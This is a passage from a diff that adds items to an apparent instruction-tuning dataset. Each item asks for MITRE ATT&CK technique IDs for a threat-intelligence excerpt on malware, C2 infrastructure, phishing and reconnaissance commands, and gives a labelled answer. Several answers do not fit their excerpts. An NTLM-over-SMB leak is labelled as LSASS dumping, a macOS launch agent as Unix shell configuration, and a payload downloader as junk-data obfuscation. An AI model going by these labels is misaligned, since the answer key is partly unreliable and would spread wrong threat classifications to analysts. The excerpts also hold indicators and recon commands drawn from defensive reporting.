exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. The malware\u2019s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers then attempt to gain root access to the server by setting up a local privileged user named \u2018hilde\u2019 on the host server and use it in order to connect back via SSH", + "output": "- T1021.004: Remote Services - SSH" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Russia-linked Shuckworm group (aka Gamaredon, Armageddon) is continuing to conduct cyber-espionage attacks against targets in Ukraine. Over the course of recent months, Symantec\u2019s Threat Hunter Team, a part of\u00a0Broadcom Software, has found evidence of attempted attacks against a number of organizations in the country", + "output": "- T1204.002: User Execution - Malicious File\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Timeline . OSX/FruitFly: 1) 2) Remove the malicious launch agent plist file ~/Library/LaunchAgents/com.client.client.plist 3) Remove the malware's persistent perl script & file. Ok, so the attackers are using an open-source multi-stage post-exploitation agent. Unfortunately this file is now inaccessible. The author of the thread announced a RAT dubbed Proton, intended for installation exclusively on MAC OS devices. Finally, the malware modifies the infected host's network settings in order to set up a proxy who's address is (dynamically) specified via a remote proxy auto-configuration (PAC) file. As it's a binary plist file, dump its contents with the plutil utility (using the -p commandline flag): . As the KeepAlive key has been set to 1 (true), the Launch Daemon will be automatically started everytime the infected system is rebooted. MacRansom is the the first 'Ransomware-as-a-Service' for macOS, that aims to encrypt (ransom) all user's files. Then these files will be passed (to a new instance) of the malware, in order to be encrypted. Thus it appears that once encrypted, the files are pretty much gone for good (save for a perhaps a brute force decryption attack). Good news, RansomWhere. Using the neat 'Suspicious Package' application, we can statically examine this script: In short, it persists CPUMeaner as a launch agent via the /Library/LaunchAgents/com.osxext.cpucooler.plist file", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Various scans and queries are used to find proxy settings, domain controllers, remote desktop services, Citrix services, and network shares. Otherwise, a jump host or other system likely used by domain admins is found and equipped with a Cobalt Strike beacon", + "output": "- T1012: Query Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The original Microsoft Excel spreadsheet is copied into the %TEMP% directory - The embedded object \u201cxl\\embeddings\\oleObject1[.]bin\u201d inside the Microsoft Excel spreadsheet is copied into the %TEMP% directory - The DLL inside oleObject1.bin is extracted and copied into %APPDATA% by the \u201cReadAndWriteExtractedBinFile\u201d function - The DLL is loaded with LoadLibraryA - The DLL\u2019s exported function, such as \u201cGet2\u201d, is run by the macro", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This feature generates a stageless Beacon payload artifact, hosts it on Cobalt Strike\u2019s web server, and presents a one-liner to download and run the artifact", + "output": "- T1197: BITS Jobs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The\u00a0NetWire\u00a0payloads in all observed campaigns included nearly identical configurations. Specifically, the C2 domain clients[.]enigmasolutions[.]xyz and the password were\u00a0the same", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Upon exploitation, a GH0ST RAT variant is delivered to the victims\u2019 system, which calls out to a previously known APT18 CnC address 223.25.233.248. GH0ST RAT is a backdoor derived from public source code", + "output": "- T1059: Command and Scripting Interpreter\n- T1070.001: Indicator Removal - Clear Windows Event Logs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the attack progresses, the user will be taken to the download of an MS Word document containing malicious macros that has very low detection rate at the moment of this campaign delivery. From a metadata standpoint, the document does not include any specific signal or characteristic that would help us tracking documents from the same author, as shown in Figure 6", + "output": "- T1566.001: Phishing - Spearphishing Attachment\n- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Each Casbaneiro sample using this method has the buyer\u2019s ID hardcoded in its data. When it downloads such configuration file, it parses it and finds the line that is intended for the specific buyer\u2019s ID and downloads and executes the payload", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location\n- T1105: Ingress Tool Transfer\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "However, while the malware used in these new attacks uses similar infection mechanisms to PlugX, it is a completely new tool with its own specific behavior patterns and architecture. We have named this tool \u201cBBSRAT. Targeting and Infrastructure . As described in earlier reports on \u201cRoaming Tiger\u201d, the attack observed in August 2015 used weaponized exploit documents that leave Russian language decoy document files after infecting the system. Figure 2 confirms that the decoy document that opens after the malware infects the system is indeed a list of international exhibitions that were conducted on Russian territory in 2015. Analysis of the command and control (C2) infrastructure shows that the newly discovered samples of BBSRAT used the same C2 domains as previously published in the \u201cRoaming Tiger\u201d campaign, including transactiona[.]com and futuresgold[.]com. This may indicate that for the newer attack campaign using BBSRAT, the adversary may have deployed purpose-built variants and/or infrastructure for each of the intended targets. As we can see, the second command is specifically crafted to run on 64-bit versions of Microsoft Windows. Every subsequent request made by BBSRAT increments this counter by one. The following commands and sub-commands have been identified: Please refer to the appendix for a full list of identified BBSRAT samples and their associated C2 servers. Despite the fact that the information about these attackers has been public for over a year, including a listing of many of the command and control servers, they continue to reuse much of their exposed playbook", + "output": "- T1546.015: Event Triggered Execution - Component Object Model Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This DLL has no other noticeable characteristics, as it functions like a typical malicious sideload. After loading the encrypted payload in memory, it transfers the execution to a shellcode that is located at the beginning of the file. Once loaded in memory, the ZeroT shellcode does not present any kind of obfuscation, unlike that for PlugX. This shellcode is charged with unpacking the encrypted and compressed payload. As in the new PlugX dropper detailed below, this is done using RC4 and RtlDecompressBuffer. As in PlugX samples, the PE header of ZeroT has been tampered with, specifically the \u201cMZ\u201d and \u201cPE\u201d constants (Fig", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All trusted domains, domains, and domain controllers - A list of computers and network devices on the network - The infected machine user and groups the user belongs to - The infected machine, including machine name, operating system, workstation domain, and more information - Network adapters that have connected to the machine and DNS servers", + "output": "- T1016: System Network Configuration Discovery\n- T1069: Permission Groups Discovery\n- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sleeps the downloader. After that, it downloads a file from Discord. The downloaded file is in reverse byte order. Downloads file from Discord. The downloader restores the downloaded file by reversing the bytes within the file. Method that reverses the downloaded file. The restored file is a DLL and serves as the third stage of the infection chain. Retrieving third-stage public methods using Type.GetMethods", + "output": "- T1027: Obfuscated Files or Information\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The link \u201cCheck\u201d led to a Google Docs page, which contained a link that redirected to a ZIP file. The ZIP file was hosted on a likely compromised SharePoint account and contained Domenus VBS, which downloads Harpy from https[:]//fashionableeder[.]com/info. At one victim, CARBON SPIDER subsequently deployed the aforementioned custom PS Sekur stager and profiled the Active Directory environment using the utility ADFind", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Cannon gathers system information and saves it to a file named ini. The Trojan sends an email to sahro.bella7[at]post.cz with i.ini as the attachment, S_inf within the body and a subject with a unique system identifier via SMTPS from one of the following accounts: Bishtr.cam47 Lobrek.chizh Cervot.woprov 2) Bishtr.cam47 3) Lobrek.chizh 4) Cervot.woprov", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ESTSecurity inspected a malicious lure document discussing North Korean defectors. This lure document contained a UPX packed binary that reached out to wave[.]posadadesantiago[.]com. Based upon their report we believe SHA256: 252d1b7a379f97fddd691880c1cf93eaeb2a5e5572e92a25240b75953c88736c, either is or is strikingly similar to the document discussed in their blog post based on these similarities", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The primary goal of the Dark Halo\u00a0threat actor was to obtain the e-mails of specific individuals at the think tank. This included a handful of select executives, policy experts, and the IT staff at the organization. Volexity notes its investigations are directly related to the FireEye report based on overlap between command-and-control (C2) domains and other related indicators such as a backdoored server running SolarWinds Orion", + "output": "- T1114.002: Email Collection - Remote Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Finally, it creates and runs a shell script at /tmp/.server.sh, which also establishes a reverse shell", + "output": "- T1059.004: Command and Scripting Interpreter - Unix Shell\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As with campaigns attributed to BlackEnergy group the attackers used spearphishing emails with Microsoft Excel documents attached that contain malicious macros as an initial infection vector. This time malicious documents don\u2019t have any content with social engineering directing potential victims to click an Enable Content button", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 5) The PowerShell script creates a Cobalt Strike stager payload. This PowerShell script also retrieves an XOR-encoded Cobalt Strike beacon payload from an adversary-controlled domain. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When executing the code, the browser creates an invisible image tag and sets the URL to an attack server using the file:// protocol scheme. On Windows machines, this triggers a request to a remote server via the Samba networking protocol (SMB) that also transmits the user\u2019s login NTLM hash. These hashes can be cracked to retrieve the original login password by methods of brute-force, dictionary, or rainbow table lookups", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory\n- T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- T1003.004: OS Credential Dumping - LSA Secrets\n- T1555: Credentials from Password Stores\n- T1552.001: Unsecured Credentials - Credentials In Files\n- T1003.005: OS Credential Dumping - Cached Domain Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The ProgramArguments tell us where GrowlHelper is installed and that it takes at least one command line argument (-f). The RunAtLoad key confirms the implant will run every time the user logs in. To get an overview of the installation process, we can monitor file system activity for GrowlHelper events", + "output": "- T1546.004: Event Triggered Execution - Unix Shell Configuration Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TrickBot has arguably been one of the most popular Trojans for the past couple of years, used by threat actors mostly because of its modular design and highly resilient infrastructure. Bitdefender researchers even analyzed one of its modules earlier this year, particularly because it targeted telecom, education, and financial services in the US and Hong Kong", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When executed, BoomBox ensures that a directory named NV is present in its current working directory; otherwise it terminates. If the directory is present, BoomBox displays the contents of the NV directory in a new Windows Explorer window (leaving it up to the user to open the PDF file", + "output": "- T1480: Execution Guardrails\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Like many other phishing attacks, in this phishing campaign, Charming Kitten uses a fake SMS (Figure 1) to trick their victims. They send confirmation messages stating \u2018Google Account Recovery\u2019 to their targets; they claim these messages are sent by Google and the user must follow the link in the SMS to confirm the identity", + "output": "- T1598.003: Phishing for Information - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. For full, comprehensive documentation of the tool and all of its commands, see bitsadmin and bitsadmin examples in the Windows IT Pro Center", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the malware starts it tries to reach a hardcoded C2. The communication takes place using the unmodified HTTP-based protocol, the request and response body are RC4-encrypted, and the encryption key is also hardcoded into the sample. As the result of the RC4 encryption may contain binary data, the malware additionally encodes it in BASE64, to match the HTTP specification", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In addition to the aforementioned DOCX file, we found another related DDE enabled document based on an infrastructure overlap with a Zebrocy C2 IP address. This related delivery document was an RTF file that downloaded and installed a payload used to load the open-source Koadic tool. We do not have telemetry on the target or attack vector, but we know the RTF file used DDE to download and execute an executable that loaded Koadic. We believe the actor used a cryptor on the payload, as it obtains a filename and script from within its resources and decodes these resources by multiplying each byte by negative one. The payload then uses the MD5 hash (14331d289e737093994395d3fc412afc) of what appears to be a hardcoded SHA1 hash (B6A75B1EF701710D7AEADE0FE93DE8477F3BD506) as an RC4 key to decrypts the resulting decoded data. The embedded VBScript is retrieved from a resource and decrypted using the same algorithm as discussed above, which results in the following cleartext", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Impersonation using Kerberos pass-the-ticket attacks (Mimikatz PowerShell) - Email extraction from the MS Exchange Server using compromised credentials - Archiving sensitive information - Data exfiltration via legitimate cloud services - Secure file deletion", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1114.002: Email Collection - Remote Email Collection\n- T1550.003: Use Alternate Authentication Material - Pass the Ticket\n- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Computer name - System info using: cmd /c systeminfo >%temp%\\temp.ini - List of currently running process using: cmd /c tasklist >%temp%\\temp.ini", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Different drivers will be loaded based on the system version. The malware uses IsWow64Process to determine which driver version to load. These drivers are stored in the resource section of the binary and are compressed with the Lempel-Ziv algorithm. The driver file is written to system32\\drivers with a 4-character, pseudo-randomly generated name. This file is then decompressed using LZCopy to a new file with a \u201c.sys\u201d extension", + "output": "- T1027: Obfuscated Files or Information\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The main purpose of P8RAT is downloading and executing payloads (consisting of PE and shellcode) from its C2 server", + "output": "- T1001.001: Data Obfuscation - Junk Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Throughout 2017 and 2018 Unit 42 has been tracking and observing a series of highly targeted attacks focused in South East Asia, building on our research into the KHRAT Trojan. Based on the evidence, these attacks appear to be conducted by the same set of attackers using previously unknown malware families. In addition, these attacks appear to be highly targeted in their distribution of the malware used, as well as the targets chosen. We believe this group is previously unidentified and therefore have we have dubbed it \u201cRANCOR\u201d. The Rancor group\u2019s attacks use two primary malware families which we describe in depth later in this blog and are naming DDKONG and PLAINTEE. DDKONG is used throughout the campaign and PLAINTEE appears to be new addition to these attackers\u2019 toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to", + "output": "- T1105: Ingress Tool Transfer\n- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Some additional log file analysis reveals that a dotm file hosted with a. jpg extension was accessed by an Israeli IP address. This IP address likely belongs to a victim in Israel that executed the main DOCX. Based on the analysis of the user-agent string belonging to the Israel IP address Microsoft+Office+Existence+Discovery indicates that the dotm file in question was downloaded from within Microsoft Office (template injection", 